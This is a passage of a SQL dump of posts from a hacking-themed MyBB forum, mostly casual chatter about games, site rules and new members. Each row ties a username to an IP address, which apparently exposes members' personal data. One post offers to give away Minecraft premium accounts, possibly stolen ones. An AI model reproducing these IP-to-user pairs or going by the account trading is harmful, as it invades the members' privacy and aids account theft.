`smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4532', '840', '4390', '4', 'RE: Its andrew', '0', '82', 'iTzIpod', '1350158069', 'Welcome to L33tHacking Andrew. Enjoy your stay here! :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '302c9455551476c28bced6996700da3a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4533', '854', '4510', '7', 'RE: Boasting thread', '0', '82', 'iTzIpod', '1350158101', 'Nice. How did you do that though?!?!? -.- Teach me please!! :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '555a6df42af36ac1e360e28658c383a7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4534', '3', '4511', '19', 'RE: Official Site Rules', '0', '61', 'NXK', '1350159621', '[quote=\'??????????¢™\' pid=\'4511\' dateline=\'1350156197\'] [quote=\'NXK\' pid=\'4504\' dateline=\'1350152885\'] So you copy and pasted Hack forums rules, Literally word for word. Wow that doesn\'t make us look like a bunch of leechers. [/quote] These rules are old when I was one of the first admins here, when this site first started. [/quote] They\'re the exact same.. you just left some of HFs rules out. Hack Forum Rules 1. Members are not allowed to engage in threatening behavior toward other members. This includes flaming. Also threats to steal accounts, dox, or swat. This includes any on-site material such as posts, PMs, or profiles. 2. No short, low quality posts like \"bump\", \"lol\", \"roflmao\", \"thanks\" and any repeated characters to defeat the min character count. 3. Don\'t attempt to infect members with trojans, viruses, or backdoors. 4. No direct links to infected downloads in posts or profiles. 5. No posting of personal information that isn\'t yours. Privacy is to be respected here. This includes any passwords, logins or dumps. 6. Signature images can be no larger than 650x200 pixels and 500k size. Animated gifs should not be annoying. 7. You cannot ask for or offer reputation in posts, signatures, or PM. This includes encouragement like \"rep is appreciated\". 8. No adult images, adult links, or adult account trading. 9. Multiple accounts will not be allowed unless you are reporting your original account as hacked. Ban evading will result in the permanent closing of your old account and new accounts. No exceptions. 10. Advertising of competing sites is not allowed. This refers to any website with a hacker forum that\'s similar to HF. Websites without forums or forums unrelated to hacking are acceptable. Advertising includes signatures, PMs, profiles, and posts. 11. No posting of fake programs. 12. No threads or posts for donation begging. This includes loan requests. 13. All blackhat hacking activity listed on that linked page is forbidden. 14. Read the violations for profile policies and rules in that help doc. 15. No political or religious expression in your profile. This includes user titles, signatures, and avatars. 16. We do not allow site goals or achievements in signature this includes but not limited to posts, reps, upgrades, and groups memberships. 17. Any rules posted in the forums header must also be reviewed. Some forums have special policies that must be adhered to. Don\'t post in any forum without reading them. 18. Any marketplace type threads must be in the Marketplace area. A one month ban is the penalty for wrong forum posting marketplace threads. No warning will be given. Word for word.', '99.253.94.204', '1677549260', '1', '0', '61', '1350164576', '1', 'c94c1e7c393208ce8478a312361bc1fe', '0', '1350164576'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4535', '833', '4528', '3', 'RE: New feature coming up!', '0', '61', 'NXK', '1350159825', '[quote=\'iTzIpod\' pid=\'4528\' dateline=\'1350157946\'] Not looking forward to this feature. No. No. [/quote] This, People are going to abuse this and people who are going to try and spread on here are going to abuse this.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'de6f663592dbf385f96d37457bd13e45', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4536', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '254', 'Greed', '1350160563', 'lol maybe, I gotta save for a new ps3. If i have money left over I can do it.', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '865ab4d552f8880e267e699c9e1ba771', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4537', '845', '4419', '72', 'RE: whats better ps3 or xbox', '0', '254', 'Greed', '1350160624', 'lol short and sweet and true', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '466fbccdc895d6efba1568034a198ebb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4538', '3', '7', '19', 'RE: Official Site Rules', '0', '62', 'R?????zo?', '1350160904', 'we only have 14 though, someone failing at math ? :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '03cdfa58832cc787efe819f817a50ba7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4539', '854', '4510', '7', 'RE: Boasting thread', '0', '53', 'sirchamp', '1350161121', 'Now I have 45 Dollars :D This new method I bought is amazing. I bought the method for 6 Dollars hehe.', '90.155.23.2', '1520113410', '1', '0', '0', '0', '1', '58437603cd8d46bc739d9dd7df1631a4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4540', '844', '4418', '73', 'RE: TEMPLE RUN CHEAT (UNLIMITED RUN)', '0', '257', 'XxTREYZxX', '1350163058', 'yeah it still works and it is a cheat because it does somthing that gives the benifit', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '7b678cd641ea3c7adfb195f7aae1aa96', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4541', '3', '4538', '19', 'RE: Official Site Rules', '0', '3', '??????????¢™', '1350163397', '[quote=\'R?????zo?\' pid=\'4538\' dateline=\'1350160904\'] we only have 14 though, someone failing at math ? :P [/quote] I took some of them out so how am I failing math?', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '0a3a716c6cb3c77bf596a026a5669f40', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4542', '841', '4392', '71', 'RE: whats the best game ever made.', '0', '257', 'XxTREYZxX', '1350163398', 'umm whats your i kinda try and get people to tell me their Favorite game .thanks', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '0f563f9f011d382818b95e25e008a742', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4543', '846', '4420', '74', 'RE: another great pvp', '0', '257', 'XxTREYZxX', '1350163700', 'yeah sorry about this thread guys', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', 'b360ba95a85b499eab43aebde2f8b03a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4544', '833', '4493', '3', 'RE: New feature coming up!', '0', '232', 'BreShiE', '1350164258', '[quote=\'R?????zo?\' pid=\'4493\' dateline=\'1350151518\'] Wow that sounds nice, hopefully doesnt make the hosting server lag though. [/quote] It won\'t affect the performance of the server.', '78.149.81.254', '1318408702', '1', '0', '0', '0', '1', '0e2ddb77e60a3c33c70d5d692d4aeb92', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4545', '833', '4375', '3', 'RE: New feature coming up!', '0', '62', 'R?????zo?', '1350164357', 'Alright looking foward to see that then.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'ff03cf902deeb48fd5246f8e4ef12918', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4546', '3', '4538', '19', 'RE: Official Site Rules', '0', '61', 'NXK', '1350164548', '[quote=\'R?????zo?\' pid=\'4538\' dateline=\'1350160904\'] we only have 14 though, someone failing at math ? :P [/quote] You clearly didn\'t read what I said before I listed HFs rules.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '829da87b703ed56c236951dd3ae2348b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4547', '855', '0', '74', 'need a minecraft account (premium)', '0', '257', 'XxTREYZxX', '1350165520', 'hey i was just wondering if anyone coould give me a minecraft premium \\thanks hope you enjoy.', '203.104.11.10', '-882373878', '1', '0', '0', '0', '1', '00a64a6c59ca10a8a5056dfa5539c766', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4548', '854', '4539', '7', 'RE: Boasting thread', '0', '61', 'NXK', '1350165580', '[quote=\'sirchamp\' pid=\'4539\' dateline=\'1350161121\'] Now I have 45 Dollars :D This new method I bought is amazing. I bought the method for 6 Dollars hehe. [/quote] Lucky man :) I only have like 1$ made on adf.ly aha.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '524d6ca9efe4efc8d43583261200e6db', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4549', '3', '7', '19', 'RE: Official Site Rules', '0', '205', 'mothered', '1350165914', 'Perhaps you should also Include the Importance of an online virus scan report, when contributing files via one\'s own file hosting site.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '45f0bae57fe03da56316e8c8c080a8d8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4550', '840', '4390', '4', 'RE: Its andrew', '0', '205', 'mothered', '1350168177', 'Welcome aboard mate. Enjoy :)', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'e7b3ea5b7e272f20f74412ddc1cbd758', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4551', '832', '4370', '25', 'RE: [News] Windows 8 security flaw', '0', '205', 'mothered', '1350168391', 'I already have the RTM Installed and activated, with no Issues thus far. I\'m sure there\'ll be a security fix provided with Windows Update, or via Microsoft\'s site.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '7e149b37cf3ced60617034744e9c1e75', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4552', '3', '7', '19', '[Junk]Official Site Rules', '0', '1', 't3h jok3r', '1350169128', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4553', '790', '4126', '58', 'RE: Unique - Recruitment', '0', '82', 'iTzIpod', '1350170152', 'Thank you :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e6f842f23d6b2ba9aca56baf479458c4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4554', '792', '4137', '61', 'RE: Unique - Rules [PLEASE READ]', '0', '82', 'iTzIpod', '1350170218', 'Seems very nice. Keep it up Reloadzor.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '97b17312154770b84b51431c41c2d290', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4555', '812', '4261', '61', 'RE: Skype resolvers [WEB BASED]', '0', '82', 'iTzIpod', '1350170251', 'Didn\'t I post this? I forgot :/ Oh well. Nice share!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '03acdca08bd2c548e1a1fc9daf0dfd7a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4556', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '82', 'iTzIpod', '1350170296', '[align=center] :3 Thanks though hoping I can get Membership Me. Took a quick SS. Sorry if it looks really horrible. :p [img]http://i.imgur.com/daCI6.png[/img] EDIT: Here\'s another one. Hopefully this is a better one :p [img]http://i.imgur.com/xotpj.png[/img] [img]http://i.imgur.com/bFuyb.png[/img] [img]http://i.imgur.com/iue2D.png[/img] [img]http://i.imgur.com/OJP6a.png[/img] [img]http://i.imgur.com/Ijh9d.png[/img] [img]http://i.imgur.com/BX87P.png[/img] http://www.aq.com/aw-character.asp?id=iTziPod [img]http://i.imgur.com/aBy3q.png[/img] [img]http://i.imgur.com/mijVP.png[/img] [img]http://i.imgur.com/RbBxG.png[/img] [/align]', '24.212.197.164', '416597412', '1', '0', '82', '1350171590', '1', '238c0075dabcc16de54c11dfa495e465', '0', '1350171590'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4557', '844', '4418', '73', 'RE: TEMPLE RUN CHEAT (UNLIMITED RUN)', '0', '82', 'iTzIpod', '1350170366', 'I left it on overnight once :3 + I charged my iPod Dang.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3c4d452efb6c062c464a2d61c4f4f87a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4558', '855', '4547', '74', 'RE: need a minecraft account (premium)', '0', '82', 'iTzIpod', '1350170418', 'PM Me then I\'ll reply back to your PM. Don\'t worry. I got some accounts.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7dce8e0b748a1fc53b922b991c581bd9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4559', '840', '4390', '4', 'RE: Its andrew', '0', '253', 'GlowingCapes', '1350170422', 'Welcome to LH! I\'m also new, and I love it here so far. Enjoy your stay!', '173.76.159.245', '-1387487243', '0', '0', '0', '0', '1', '520f440e37790f7ce53694ed2db05be8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4560', '854', '4510', '7', 'RE: Boasting thread', '0', '82', 'iTzIpod', '1350170449', 'I only made $2 :/ And that\'s all I ever made :/ Share that method with me please :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f962ddebcd3cc6c8d36f171ac6f467ba', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4561', '845', '4430', '72', 'RE: whats better ps3 or xbox', '0', '253', 'GlowingCapes', '1350170665', 'I\'m a 360 user, and I like PS3 more. The only thing I like about 360 is the controller and some games you can\'t get on the PS3. I hate paying for Live... [quote=\'XTr3ME PiX3L\' pid=\'4430\' dateline=\'1350119317\'] XBOX 360 ALL THE WAY!!! Its MUCH easier to pirate games on it , Nowadays games cost like over a 100 dollars and i don\'t want to waste that much money. [/quote] New games don\'t cost $100+ unless it\'s CoD\'s LE (Limited Edition) games with other stuff in it. 90% of new games are $50-60 new.', '173.76.159.245', '-1387487243', '0', '0', '0', '0', '1', 'a5bbb9c3e4228153c1f4fbf25565a2cd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4562', '841', '4392', '71', 'RE: whats the best game ever made.', '0', '253', 'GlowingCapes', '1350170840', 'Different game styles and different games. So, there\'s not really a \"Best Game Ever Made.\" But.. mine\'s NHL 12 and Minecraft at the moment for favotire games though.', '173.76.159.245', '-1387487243', '0', '0', '0', '0', '1', '6a84c634c6c32a60c11e00fbc2d3925a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4563', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '2', 'Apathy', '1350173306', 'That looks like dragon fable^^^', '173.206.177.91', '-1378963109', '0', '0', '0', '0', '1', '9a340fc33791c7a9b4482eecf5b48da8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4564', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '82', 'iTzIpod', '1350173862', 'Yeah. But DragonFable sucks in my opinion. I also used a bot for that too :3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '41bb5e1bb9080fff8fb832117d1a137f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4565', '829', '4564', '74', 'RE: Adventure Quest Worlds', '0', '2', 'Apathy', '1350174516', '[quote=\'iTzIpod\' pid=\'4564\' dateline=\'1350173862\'] Yeah. But DragonFable sucks in my opinion. I also used a bot for that too :3 [/quote] Should I try this new game?', '173.206.177.91', '-1378963109', '0', '0', '0', '0', '1', '4e719ea5eb76758c9259e1393615a66d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4566', '856', '0', '42', 'Anonymous Project Mayhem 2012 | Dangerous Idea #1 / Leak it ALL!', '0', '61', 'NXK', '1350174607', '[video=youtube]http://www.youtube.com/watch?feature=player_embedded&v=QK71cUa7nnw[/video] Discuss? http://anonnews.org/press/item/1783/', '99.253.94.204', '1677549260', '1', '0', '61', '1350174627', '1', 'dc5a1cf21293e722d14484cb95791377', '0', '1350174627'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4567', '845', '4419', '72', 'RE: whats better ps3 or xbox', '0', '3', '??????????¢™', '1350177832', 'I say the xbox 360 is better than the PS3.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '02052a9658e4900b9d0ba3b62a109780', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4568', '856', '4566', '42', 'RE: Anonymous Project Mayhem 2012 | Dangerous Idea #1 / Leak it ALL!', '0', '3', '??????????¢™', '1350178161', 'Whoa that is a crazy idea.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'f503ba7be39cf9c5604fbfdaa8942e73', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4569', '845', '4419', '72', 'RE: whats better ps3 or xbox', '0', '257', 'XxTREYZxX', '1350183610', 'good work fellow L33T people this thread is really turning out to be great :)', '203.104.11.5', '-882373883', '1', '0', '0', '0', '1', '3978cc43c058dd64295e900e6aa9f42a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4570', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '82', 'iTzIpod', '1350183799', 'Not really new. But sure. I don\'t see why not.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'db90d19a633c4cbe442b51c430bb4c11', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4571', '855', '4547', '74', 'RE: need a minecraft account (premium)', '0', '257', 'XxTREYZxX', '1350184047', 'i cant pm you because its full or somehting', '203.104.11.8', '-882373880', '1', '0', '0', '0', '1', '43976f92b9adf627313a0d37a15bcbeb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4572', '856', '4566', '42', 'RE: Anonymous Project Mayhem 2012 | Dangerous Idea #1 / Leak it ALL!', '0', '257', 'XxTREYZxX', '1350184565', 'what this is the craziest ever.', '203.104.11.7', '-882373881', '1', '0', '0', '0', '1', 'a62d987c14f881257adae7c315db583f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4574', '702', '3593', '35', 'RE: You guys like my new userbar?', '0', '257', 'XxTREYZxX', '1350186704', 'its pretty mad keep up the good work', '203.104.11.5', '-882373883', '1', '0', '0', '0', '1', '6e7c8d41f95bd5a706195c367efef970', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4575', '138', '355', '35', 'RE: Make Cool Logo in just 20 sec....[HOT]', '0', '257', 'XxTREYZxX', '1350186774', 'this is nice i might try it out', '203.104.11.6', '-882373882', '1', '0', '0', '0', '1', '8323913c2ccc38e544a38c1cff770548', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4576', '854', '4510', '7', 'RE: Boasting thread', '0', '222', 'Exposé', '1350191131', 'Haha this is so much bullshit....11,000 clicks...your gonna get banned :sir:', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '6362587781dc8f9b394ad04d58695823', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4577', '788', '4480', '3', 'RE: 4000 POSTS YEAH BABY!', '0', '1', 't3h jok3r', '1350193944', '[quote=\'XxTREYZxX\' pid=\'4480\' dateline=\'1350133110\'] yeah LQ this is our home i love this community in the most homo-ess way ever [/quote] Are you calling L33T Hacking low quality?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '81b1ca84282d8beb332ec3de5de47fd6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4578', '821', '4294', '28', 'RE: What\'s on your mind or what are your future plans?', '0', '1', 't3h jok3r', '1350194065', 'Lol Greed. OT: I\'m thinking if I should drink water now or after I\'m done checking my emails.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '5a198c7881eb2008baddc908e0088c6b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4579', '849', '4468', '73', 'RE: when did you buy your ipod', '0', '1', 't3h jok3r', '1350194100', 'Me too, I upgrade my Ipod the next day after it\'s release.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '43c95293961b9fa5ac4c219df4367a28', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, 